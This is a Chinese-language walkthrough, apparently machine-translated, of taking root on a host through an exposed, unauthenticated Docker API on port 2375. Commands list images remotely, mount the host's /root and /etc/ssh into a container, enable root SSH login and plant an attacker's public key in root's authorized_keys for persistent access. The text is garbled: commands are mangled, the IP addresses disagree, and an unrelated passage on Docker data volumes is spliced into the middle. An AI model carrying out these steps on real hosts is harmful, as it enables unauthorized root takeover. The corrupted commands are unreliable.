Docker2375端口非法get shell目标机: 192.168.196.133
使用条件: docker2375非法,有可启动的主机镜像
1、判断能否利用漏洞扫描端口发现开放端口22和2375
docker-htcp ://192.168.196.13:2375 PS可以成功执行docker命令
[ root @ localhost~] # docker-h 192.168.196.13:2375 imagesrepositorytagidcreatedsizeubuntulatestba6acccc edd 29
补充数据卷
数据卷是什么意思? 类似于我们Redis上的rdb和aof文件
真能干啊容器的持续化
容器之间的共享数据继承
特点:
1 :数据卷可以在容器之间共享或重用数据
2 )卷更改可以直接生效
3 )更改数据卷不包括在镜像更新中
4 )数据卷的生命周期持续到容器不再使用
使用直接命令添加
命令: docker run -it -v /宿主机绝对路径目录:/容器内目录镜像名称
可以用其他写法添加这里,但不太说明
2、docker-h 192.168.196.13:2375 run---RM-it---entry point bash-v/root 3360/tmp/root-v/etc/ssh 3360
点击这个命令后,我进入了一个叫ubuntu的容器中,试着看了一下ps
[ root @ localhost~] # docker-h 192.168.196.13:2375 pscontaineridimagecommandcreatedstatusportsnamese 5492 f 68345 dubuntu '
查一下容器中靶机的路线是否可以登录
我们一般都在看名为/etc/ssh/sshd_config的文件。 我们正好把他的目录映射到了我们的/tmp/ssh_etc下。 现在让我们看看/tmp/ssh_etc/sshd_config,看看Permitroottc。如果否,则更改为yes,以便root可以通过ssh登录
然后你攻击机器,在新形成的外壳中生成pubkey
[ root @ localhost~] # ssh-keygen-trsa-c ' l1nr ' generatingpublic/privatersakeypair.enterfileinwhichtosavethekey 333 3360 entersamepassphraseagain : youridentificationhasbeensavedinid _ RSA.yourpublickeyhasbeensavedinid _ RSA.pu the 333650 uhko9c4/km/legr 14 z24 ql1 nrthekey ' srandomartimageis :---[ RSA 2048 ]---| . ooo.|.oso . e.||o . o *|. o.||. o.||. o.o.|---- [ sha 256 ]----现在,在当前目录中确认两个生成
一个id_rsa个id_rsa.pub
然后返回容器,将我们的id_rsa.pub的内容写入名为/tmp/root/.shh/authorized_keys的文件中。 此文件与被攻击计算机上的/root/.shh/authorized_keys相同。 如果没有这个
完成这个步骤后,我们的攻击机可以利用我们的id_rsa文件直接连接到我们的目标机
ssh-I id _ RSA root @ 192.168.196.133连接时,请记住必须手动输入yes才能直接返回托架进行连接